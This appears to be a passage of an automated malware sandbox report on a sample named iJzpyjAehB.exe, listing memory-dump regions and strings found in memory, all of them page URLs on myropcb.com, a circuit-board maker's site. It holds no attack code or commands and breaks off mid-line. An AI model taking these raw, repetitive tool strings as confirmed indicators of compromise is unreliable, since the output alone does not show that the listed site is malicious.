                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.300368242.0000000004C10000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.314410694.0000000003120000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.439075116.0000000008E00000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.302597912.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.311024379.0000000003180000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000002.596543130.0000000003910000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.367774012.00000000039B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.347627951.00000000034E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.467548512.00000000036B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.440284917.0000000002FE0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.316183261.0000000003480000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.460052279.0000000000A40000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/services-capabilities/enclosure/
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.300368242.0000000004C10000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.314410694.0000000003120000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.439075116.0000000008E00000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.302597912.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.311024379.0000000003180000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000002.596543130.0000000003910000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.367774012.00000000039B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.347627951.00000000034E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.467548512.00000000036B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.440284917.0000000002FE0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.316183261.0000000003480000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.460052279.0000000000A40000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/services-capabilities/fpc-flexible-printed-circuits/
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.300368242.0000000004C10000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.314410694.0000000003120000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.439075116.0000000008E00000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.302597912.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.311024379.0000000003180000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000002.596543130.0000000003910000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.367774012.00000000039B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.347627951.00000000034E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.467548512.00000000036B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.440284917.0000000002FE0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.316183261.0000000003480000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.460052279.0000000000A40000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/services-capabilities/hdipcb/
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.300368242.0000000004C10000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.314410694.0000000003120000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.439075116.0000000008E00000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.302597912.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.311024379.0000000003180000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000002.596543130.0000000003910000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.367774012.00000000039B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.347627951.00000000034E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.467548512.00000000036B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.440284917.0000000002FE0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.316183261.0000000003480000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.460052279.0000000000A40000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/services-capabilities/myro-intelligent-cloud-forehead-thermometer/
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.300368242.0000000004C10000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.314410694.0000000003120000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.439075116.0000000008E00000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.302597912.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.311024379.0000000003180000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000002.596543130.0000000003910000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.367774012.00000000039B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.347627951.00000000034E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.467548512.00000000036B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.440284917.0000000002FE0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.316183261.0000000003480000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.460052279.0000000000A40000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/services-capabilities/pcb-capabilities/
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.300368242.0000000004C10000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.314410694.0000000003120000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.439075116.0000000008E00000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.302597912.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.311024379.0000000003180000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000002.596543130.0000000003910000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.367774012.00000000039B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.347627951.00000000034E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.467548512.00000000036B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.440284917.0000000002FE0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.316183261.0000000003480000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.460052279.0000000000A40000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/services-capabilities/pcb-design-layout/
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.300368242.0000000004C10000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.314410694.0000000003120000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.439075116.0000000008E00000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.302597912.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.311024379.0000000003180000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000002.596543130.0000000003910000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.367774012.00000000039B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.347627951.00000000034E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.467548512.00000000036B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.440284917.0000000002FE0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.316183261.0000000003480000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.460052279.0000000000A40000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/services-capabilities/pcb-restoration/
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.300368242.0000000004C10000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.314410694.0000000003120000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.439075116.0000000008E00000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.302597912.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.311024379.0000000003180000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000002.596543130.0000000003910000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.367774012.00000000039B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.347627951.00000000034E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.467548512.00000000036B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.440284917.0000000002FE0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.316183261.0000000003480000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.460052279.0000000000A40000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/services-capabilities/pcba-services/
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.300368242.0000000004C10000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.314410694.0000000003120000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.439075116.0000000008E00000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.302597912.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.311024379.0000000003180000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000002.596543130.0000000003910000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.367774012.00000000039B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.347627951.00000000034E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.467548512.00000000036B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.440284917.0000000002FE0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.316183261.0000000003480000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.460052279.0000000000A40000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/services-capabilities/special-offer-specifications/
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.300368242.0000000004C10000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.314410694.0000000003120000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.439075116.0000000008E00000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.302597912.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.311024379.0000000003180000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000002.596543130.0000000003910000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.367774012.00000000039B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.347627951.00000000034E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.467548512.00000000036B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.440284917.0000000002FE0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.316183261.0000000003480000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.460052279.0000000000A40000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/services-capabilities/stencil/
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.300368242.0000000004C10000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.314410694.0000000003120000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.439075116.0000000008E00000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.302597912.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.311024379.0000000003180000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000002.596543130.0000000003910000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.367774012.00000000039B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.347627951.00000000034E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.467548512.00000000036B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.440284917.0000000002FE0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.316183261.0000000003480000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.460052279.0000000000A40000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/testimonial/
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.300368242.0000000004C10000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.314410694.0000000003120000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.439075116.0000000008E00000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.302597912.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.311024379.0000000003180000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000002.596543130.0000000003910000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.367774012.00000000039B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.347627951.00000000034E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.467548512.00000000036B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.440284917.0000000002FE0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.316183261.0000000003480000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.460052279.0000000000A40000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/why-use-myro/
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.300368242.0000000004C10000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.314410694.0000000003120000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.439075116.0000000008E00000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.302597912.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.311024379.0000000003180000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000002.596543130.0000000003910000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.367774012.00000000039B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.347627951.00000000034E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.467548512.00000000036B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.440284917.0000000002FE0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.316183261.0000000003480000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.460052279.0000000000A40000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/why-use-myro/about-us/
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.300368242.0000000004C10000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.314410694.0000000003120000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.439075116.0000000008E00000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.302597912.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.311024379.0000000003180000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000002.596543130.0000000003910000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.367774012.00000000039B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.347627951.00000000034E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.467548512.00000000036B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.440284917.0000000002FE0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.316183261.0000000003480000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.460052279.0000000000A40000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/why-use-myro/agents-brokers/
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.300368242.0000000004C10000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.314410694.0000000003120000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.439075116.0000000008E00000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.302597912.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.311024379.0000000003180000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000002.596543130.0000000003910000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.367774012.00000000039B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 